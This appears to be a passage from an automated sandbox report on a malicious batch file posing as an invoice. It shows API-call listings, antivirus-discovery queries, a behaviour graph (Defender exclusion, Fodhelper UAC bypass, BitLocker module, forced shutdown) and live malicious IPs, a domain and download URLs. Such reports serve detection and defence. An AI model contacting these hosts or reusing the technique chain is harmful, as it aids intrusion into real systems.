Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_00D016F9 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_00D016F9
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD96340 _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,strlen,_malloc_crt,strlen,strcpy_s,_invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight, 9_2_6FD96340
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDBBCAE GetSystemInfo,memset,GetVersionExW,??0unsupported_os@Concurrency@@QAE@XZ,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,??0unsupported_os@Concurrency@@QAE@XZ,GetModuleHandleW,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,GetLastError,GetLastError,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,malloc,??0exception@std@@QAE@ABQBDH@Z,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,free,GetLastError,GetLastError,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,malloc,??0exception@std@@QAE@ABQBDH@Z,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,free,??0unsupported_os@Concurrency@@QAE@XZ, 9_2_6FDBBCAE
AV process strings found (often used to terminate AV products)
Source: powershell.exe, 00000004.00000002.30085176960.000001E7908CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542952 Sample: Factura-2410-CFDI.bat Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 68 fsnat.shop 2->68 70 Suricata IDS alerts for network traffic 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for dropped file 2->74 76 11 other signatures 2->76 10 cmd.exe 1 2->10         started        13 _kjfech8_Vi7.exe 1 2->13         started        15 cmd.exe 1 2->15         started        signatures3 process4 signatures5 90 Suspicious powershell command line found 10->90 92 Bypasses PowerShell execution policy 10->92 17 powershell.exe 16 50 10->17         started        22 curl.exe 2 10->22         started        24 powershell.exe 9 10->24         started        26 conhost.exe 10->26         started        94 Adds a directory exclusion to Windows Defender 13->94 28 conhost.exe 1 13->28         started        30 powershell.exe 28 15->30         started        32 conhost.exe 1 15->32         started        34 cmd.exe 1 15->34         started        process6 dnsIp7 62 62.72.3.210, 49750, 80 PRTL-DE Germany 17->62 64 86.38.217.167, 80 LRTC-ASLT Lithuania 17->64 52 C:\_kjfech8_V\jli.dll, PE32 17->52 dropped 54 C:\_kjfech8_V\exe.txt, PE32 17->54 dropped 56 C:\_kjfech8_V\_kjfech8_V.exe (copy), PE32 17->56 dropped 60 10 other files (3 malicious) 17->60 dropped 78 UAC bypass detected (Fodhelper) 17->78 80 Uses shutdown.exe to shutdown or reboot the system 17->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 17->82 84 3 other signatures 17->84 36 _kjfech8_Vi7.exe 2 17->36         started        39 shutdown.exe 1 17->39         started        58 C:\Users\Public\Documents\vs1.ps1, awk 22->58 dropped 66 fsnat.shop 93.127.200.211, 443, 49752 ASMUNDA-ASSC Germany 30->66 file8 signatures9 process10 signatures11 86 Adds a directory exclusion to Windows Defender 36->86 41 powershell.exe 23 36->41         started        44 WerFault.exe 21 16 36->44         started        46 conhost.exe 36->46         started        process12 signatures13 88 Loading BitLocker PowerShell Module 41->88 48 conhost.exe 41->48         started        50 WmiPrvSE.exe 41->50         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
93.127.200.211
 fsnat.shop Germany
62255 ASMUNDA-ASSC true
62.72.3.210
 unknown Germany
5427 PRTL-DE true
86.38.217.167
 unknown Lithuania
15419 LRTC-ASLT false

Contacted Domains

Name IP Active
fsnat.shop 93.127.200.211 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://62.72.3.210/ldht/index.php true
    		unknown
    https://fsnat.shop/a/08/150822/up/up true
      		unknown